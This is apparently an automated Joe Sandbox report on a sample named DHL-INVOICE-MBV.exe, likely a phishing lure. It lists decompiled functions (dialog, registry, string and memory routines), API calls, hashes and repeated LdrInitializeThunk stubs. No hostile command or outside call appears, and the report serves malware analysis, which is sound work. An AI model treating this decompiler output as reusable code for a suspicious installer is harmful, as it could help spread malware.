CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
Instruction ID: aa51e3e4afe09322c41c699d4a644ad1219c84700ea5711a82ba7ac080bff55b
Opcode Fuzzy Hash: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
Instruction Fuzzy Hash: EFF0DA30545720EFC7616B60FE0CA9B7B65BB04B11741497EF449F12A4DBB94891CAAC

Uniqueness

Uniqueness Score: -1.00%

Function 00405260 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00405260(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x4236d4 != _t16) {
							_push(_t16);
							_push(6);
							 *0x4236d4 = _t16;
							E00404C36();
						}
						L11:
						return CallWindowProcW( *0x4236dc, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404BB6(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404247(0x413);
				return 0;
			}

0x00405264
0x0040526e
0x0040528a
0x004052ac
0x004052af
0x004052b5
0x004052bf
0x004052c0
0x004052c2
0x004052c8
0x004052c8
0x004052d2
0x00000000
0x004052e0
0x00405297
0x004052cf
0x004052cf
0x00000000
0x004052cf
0x004052a3
0x004052a5
0x00000000
0x004052a5
0x00405274
0x00000000
0x00000000
0x0040527b
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 0040528F
CallWindowProcW.USER32(?,?,?,?), ref: 004052E0

Part of subcall function 00404247: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259

Strings

, xrefs: 00405270

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
Instruction ID: 4f709491620671f980d9c6db17d5b9619efa9f8d8c8bffacc159c43cff332a87
Opcode Fuzzy Hash: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
Instruction Fuzzy Hash: 20019E7120060CAFDB319F40ED80A9B3B26EF90715F60007AFA00B52D1C73A9C529F69

Uniqueness

Uniqueness Score: -1.00%

Function 00406152 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00406152(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004060F1(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406160
0x00406162
0x0040617a
0x0040617f
0x00406184
0x004061c2
0x004061c2
0x00406186
0x00406198
0x004061a3
0x004061a9
0x004061b4
0x00000000
0x00000000
0x004061b4
0x004061c8

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,004063C6,80000002), ref: 00406198
RegCloseKey.ADVAPI32(?,?,004063C6,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll), ref: 004061A3

Strings

Call, xrefs: 00406159

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 359bde3ee35bb60dfaf4513243971435c641af9e5133143b55c2bc1c1ca92d99
Instruction ID: bbbd3ef8f6d6f34ea5303db1c751cd258066777a1c36f61d7f193cbbff11b307
Opcode Fuzzy Hash: 359bde3ee35bb60dfaf4513243971435c641af9e5133143b55c2bc1c1ca92d99
Instruction Fuzzy Hash: B701BC32510209EBDF21CF50CD09EDF3BA8EB04360F01803AFD06A6191D738DA68CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004038DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004038DF() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x4216ac;
				_t3 = E004038C4(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x4216ac =  *0x4216ac & 0x00000000;
				return _t3;
			}

0x004038e0
0x004038e8
0x004038ef
0x004038f2
0x004038f2
0x004038f4
0x004038f9
0x00403900
0x00403906
0x0040390a
0x0040390b
0x00403913

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75F73420,004038B7,004036CD,00000006,?,00000006,00000008,0000000A), ref: 004038F9
GlobalFree.KERNEL32(?), ref: 00403900

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004038F1

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
Instruction ID: bd2e2babf5735c078d8cab401dc84ea4626969b40d457a48d01b9ed958f4fa52
Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
Instruction Fuzzy Hash: D6E01D339111305FC6315F55ED0475E77A95F54F22F05457BF8807716047745C925BD8

Uniqueness

Uniqueness Score: -1.00%

Function 00405BA5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405BA5(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}

0x00405ba6
0x00405bb0
0x00405bb3
0x00405bb9
0x00405bba
0x00405bbb
0x00405bc3
0x00000000
0x00000000
0x00000000
0x00405bc3
0x00405bc5
0x00405bcd

APIs

lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL-INVOICE-MBV.exe,C:\Users\user\Desktop\DHL-INVOICE-MBV.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BAB
CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL-INVOICE-MBV.exe,C:\Users\user\Desktop\DHL-INVOICE-MBV.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBB

Strings

C:\Users\user\Desktop, xrefs: 00405BA5

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
Instruction ID: 7007ae8f4af5416befc6157b9dfefed4fe058ad6210d844be01a540b02b626a9
Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
Instruction Fuzzy Hash: 2ED05EB3411A209AD3226B04DD04D9F77B8EF51304746446AE840A61A6D7B87D8186AC

Uniqueness

Uniqueness Score: -1.00%

Function 741110E1 Relevance: 5.1, APIs: 4, Instructions: 104
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E741110E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v0;
				void* _t17;
				signed int _t19;
				void* _t20;
				void* _t24;
				void* _t26;
				void* _t30;
				void* _t36;
				void* _t38;
				void* _t39;
				signed int _t41;
				void* _t42;
				void* _t51;
				void* _t52;
				signed short* _t54;
				void* _t56;
				void* _t59;
				void* _t61;

				 *0x7411406c = _a8;
				 *0x74114070 = _a16;
				 *0x74114074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x74114048, E741115B1, _t51, _t56);
				_t41 =  *0x7411406c +  *0x7411406c * 4 << 3;
				_t17 = E74111243();
				_v0 = _t17;
				_t52 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_t17);
				} else {
					do {
						_t19 =  *_t52 & 0x0000ffff;
						_t42 = 2;
						_t54 = _t52 + _t42;
						_t61 = _t19 - 0x6c;
						if(_t61 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t52 = _t54 + _t42;
								_t24 = E74111272(E741112BA(( *_t54 & 0x0000ffff) - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t26 = _t20 - _t42;
							if(_t26 == 0) {
								L10:
								_t52 =  &(_t54[1]);
								_t24 = E741112E1(( *_t54 & 0x0000ffff) - 0x30, E74111243());
								goto L13;
							}
							L7:
							if(_t26 == 1) {
								_t30 = GlobalAlloc(0x40, _t41 + 4);
								 *_t30 =  *0x74114040;
								 *0x74114040 = _t30;
								E74111563(_t30 + 4,  *0x74114074, _t41);
								_t59 = _t59 + 0xc;
							}
							goto L14;
						}
						if(_t61 == 0) {
							L17:
							_t33 =  *0x74114040;
							if( *0x74114040 != 0) {
								E74111563( *0x74114074, _t33 + 4, _t41);
								_t59 = _t59 + 0xc;
								_t36 =  *0x74114040;
								GlobalFree(_t36);
								 *0x74114040 =  *_t36;
							}
							goto L14;
						}
						_t38 = _t19 - 0x4c;
						if(_t38 == 0) {
							goto L17;
						}
						_t39 = _t38 - 4;
						if(_t39 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L12;
						}
						_t26 = _t39 - _t42;
						if(_t26 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t52 != 0);
					_t17 = _v0;
					goto L16;
				}
			}

0x741110e6
0x741110f0
0x741110ff
0x7411110e
0x74111119
0x7411111c
0x7411112b
0x7411112f
0x74111131
0x741111d8
0x741111de
0x74111137
0x74111138
0x74111138
0x7411113d
0x7411113e
0x74111140
0x74111143
0x7411120d
0x74111210
0x741111b0
0x741111b6
0x741111bf
0x741111c4
0x741111c7
0x00000000
0x741111c7
0x74111212
0x74111214
0x74111196
0x7411119d
0x741111a5
0x00000000
0x741111a5
0x74111161
0x74111162
0x7411116a
0x74111177
0x7411117f
0x74111188
0x7411118d
0x7411118d
0x00000000
0x74111162
0x74111149
0x741111df
0x741111df
0x741111e6
0x741111f3
0x741111f8
0x741111fb
0x74111203
0x74111205
0x74111205
0x00000000
0x741111e6
0x7411114f
0x74111152
0x00000000
0x00000000
0x74111158
0x7411115b
0x741111ac
0x00000000
0x741111ac
0x7411115d
0x7411115f
0x74111192
0x00000000
0x74111192
0x00000000
0x741111c9
0x741111c9
0x741111d3
0x00000000
0x741111d7

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 7411116A
GlobalFree.KERNEL32(00000000), ref: 741111C7
GlobalFree.KERNEL32(00000000), ref: 741111D9
GlobalFree.KERNEL32(?), ref: 74111203

Memory Dump Source

Source File: 00000001.00000002.18002086592.0000000074111000.00000020.00000001.01000000.00000004.sdmp, Offset: 74110000, based on PE: true

Associated: 00000001.00000002.18002024165.0000000074110000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18002166253.0000000074113000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18002259835.0000000074115000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74110000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: bd39119b7ecae3e0564840a0663c8715a20dd90310b5d1c181dce6496ff66a16
Instruction ID: 5c1468e59018f9442bba66c1389f8381f6cb5477664d2efab14f5dced825e212
Opcode Fuzzy Hash: bd39119b7ecae3e0564840a0663c8715a20dd90310b5d1c181dce6496ff66a16
Instruction Fuzzy Hash: 3331C1B26442079BE700FF77DA84AA9F7F8EB496107260539F842D3606F734DA00CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00405CDF Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CDF(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405cef
0x00405cf1
0x00405cf4
0x00405d20
0x00405cf9
0x00405d02
0x00405d07
0x00405d12
0x00405d15
0x00405d31
0x00405d17
0x00405d1e
0x00000000
0x00405d1e
0x00405d2a
0x00405d2e
0x00405d2e
0x00405d28
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D07
CharNextA.USER32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D18
lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction ID: 3a8cc870ad476bca9dd132dfabecf91d91790aae7b943354cd32c9fe52050a58
Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction Fuzzy Hash: 09F0F631204918FFDB029FA4DD0499FBBA8EF16350B2580BAE840F7211D674DE01AB98

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: DHL-INVOICE-MBV.exePID: 4144, Parent PID: 6028COMMON

Execution Graph

Execution Coverage:	0%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	5
Total number of Limit Nodes:	1

Executed Functions

Function 1D7E2D10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1D7E2D1A

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b78df2a25969c3a087ad3e214ba614af4bb08be38cf324eec3331155776ffc5b
Instruction ID: d942434913eee6156cb00403faad1fe5a134a3309d0048a31b0a41f15a2edab5
Opcode Fuzzy Hash: b78df2a25969c3a087ad3e214ba614af4bb08be38cf324eec3331155776ffc5b
Instruction Fuzzy Hash: D190027125102413D9216258460470B000947D0261FD1CD16A0514928DD66A8952B123

Uniqueness

Uniqueness Score: -1.00%

Function 1D7E2DC0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1D7E2DCA

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5719cb8736cd2955d6d964d888ef6b82bef4d2891f401b5a0cfcf05c349f07f1
Instruction ID: 742358694780226ddd3a93669f22231f2469071c6f3a439b8d2a1ba9d6fc56fe
Opcode Fuzzy Hash: 5719cb8736cd2955d6d964d888ef6b82bef4d2891f401b5a0cfcf05c349f07f1
Instruction Fuzzy Hash: BC9002B125102402D9507258450474A000547D0321F91C915A5154924EC66D8DD57667

Uniqueness

Uniqueness Score: -1.00%

Function 1D7E2DA0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1D7E2DAA

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f917f170ba130c9d910ab22335137c36b280d32ba4258e5a06ec51839d258727
Instruction ID: 3fca2ea7d121896b14105cfda74b3859ce2f73fb7a1094c956f4ccd16a8ef620
Opcode Fuzzy Hash: f917f170ba130c9d910ab22335137c36b280d32ba4258e5a06ec51839d258727
Instruction Fuzzy Hash: 9390026165102502D9117258450461A000A47D0261FD1C926A1114925ECA398992B133

Uniqueness

Uniqueness Score: -1.00%

Function 1D7E2C50 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1D7E2C5A

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a4530783ae94364a7f2beed9889b1ed55c0a080e40d247029710c433b62b3cd9
Instruction ID: 30bb6f5f8b06f7accdaea187247661eedee4d800d416283fd94ac4e9bef6f687
Opcode Fuzzy Hash: a4530783ae94364a7f2beed9889b1ed55c0a080e40d247029710c433b62b3cd9
Instruction Fuzzy Hash: 7990026135102003D9507258551860A400597E1321F91D915E0504924CD92988566223

Uniqueness

Uniqueness Score: -1.00%

Function 1D7E2C30 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1D7E2C3A

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 46b58f3ce9e12fed1ee5780b227fcdf917ba2396db0fabbb799f4eb9314afb61
Instruction ID: c6b43f997b7bbf6e959151ed1c1c60a5be111b86e162f163378d96530f590bc7
Opcode Fuzzy Hash: 46b58f3ce9e12fed1ee5780b227fcdf917ba2396db0fabbb799f4eb9314afb61
Instruction Fuzzy Hash: 2390026926302002D9907258550860E000547D1222FD1DD19A0105928CC92988696323

Uniqueness

Uniqueness Score: -1.00%

Function 1D7E2CF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1D7E2CFA

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34dea8f9a9b65a09b3a269c7ccc3d2e78fbd1347c3b8637f36f804ff0845ab2a
Instruction ID: 035c82af4ad890f490b875e73d1c0719f1472ec66c0ef5b8a1ab4d0428a2d9e0
Opcode Fuzzy Hash: 34dea8f9a9b65a09b3a269c7ccc3d2e78fbd1347c3b8637f36f804ff0845ab2a
Instruction Fuzzy Hash: 36900261292061525D55B258450450B400657E02617D1C916A1504D20CC53A9856E623

Uniqueness

Uniqueness Score: -1.00%

Function 1D7E2F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1D7E2F0A

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
